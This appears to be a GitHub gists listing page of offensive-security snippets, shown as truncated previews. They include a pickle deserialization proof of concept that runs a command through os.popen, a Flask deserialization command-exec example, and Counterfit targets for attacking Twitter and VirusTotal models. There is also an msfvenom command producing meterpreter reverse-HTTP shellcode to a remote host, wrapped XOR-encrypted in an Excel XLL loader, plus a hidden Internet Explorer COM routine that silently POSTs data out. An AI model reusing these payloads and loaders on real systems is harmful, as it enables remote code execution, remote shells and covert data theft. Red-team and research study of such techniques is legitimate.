Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

moo_hax moohax

🏠
Working from home
View GitHub Profile
@moohax
moohax / collisionLSH.py
Created Aug 19, 2021 — forked from unrealwill/collisionLSH.py
Proof of Concept : generating collisions on a neural perceptual hash
View collisionLSH.py
import tensorflow as tf #We need tensorflow 2.x
import numpy as np
#The hashlength in bits
hashLength = 256
def buildModel():
#we can set the seed to simulate the fact that this network is known and doesn't change between runs
#tf.random.set_seed(42)
model = tf.keras.Sequential()
View twitter.py
# Generated by counterfit #
import requests
import base64
from counterfit.core.targets import ArtTarget
class Twitter(ArtTarget):
model_name = "twitter"
View vt_target.md

Workshop Commands and Functions

Gettings Started

Requirements

  • An Internet Connection
  • Docker
  • VirusTotal Account (username and password)
  • The following headers, which can be gathered by examining the headers in Burp or DevTools.
    • X-Recaptcha-Response
View virustotal.py
# Generated by counterfit #
# code modified from https://github.com/monoxgas/FlyingAFalseFlag/blob/256197b78a8140d15df6e18b3221b637b5c3490a/Addendum/addendum.py
import os
import re
import json
import time
import requests
import numpy as np
import tqdm
@moohax
moohax / cereal_poc.py
Created Oct 19, 2020
Deserialization of custom class in pickle/numpy/PyTorch
View cereal_poc.py
# Create a class - normally this is a machine learning model saved to disk
class MLModel():
def __reduce__(self):
import os
execution = 'cmd.exe /c calc.exe'
return (os.popen, (execution,))
# Serialize it.
import pickle
payload = pickle.dumps(MLModel())
@moohax
moohax / cereal_web.py
Created Oct 19, 2020
Example of deserialization for command exec through pickle
View cereal_web.py
import pickle
import base64
import requests
from flask import Flask, request
app = Flask(__name__)
## Start the server and go to 127.0.0.1:5000/exec ##
View sandbox_detect.py
import keras
from keras import models
from keras import layers
from sklearn.preprocessing import StandardScaler, MinMaxScaler, LabelEncoder
import numpy as np
import keras.backend as K
# Main
np.random.seed(7)
network = models.Sequential()
View enclave.cpp
// enclave.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "Windows.h"
#include "Winbase.h"
#include "enclaveapi.h"
#include <iostream>
#pragma comment(lib, "Kernel32.lib")
View shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
@moohax
moohax / ie_com.cs
Created Feb 13, 2018 — forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
View ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);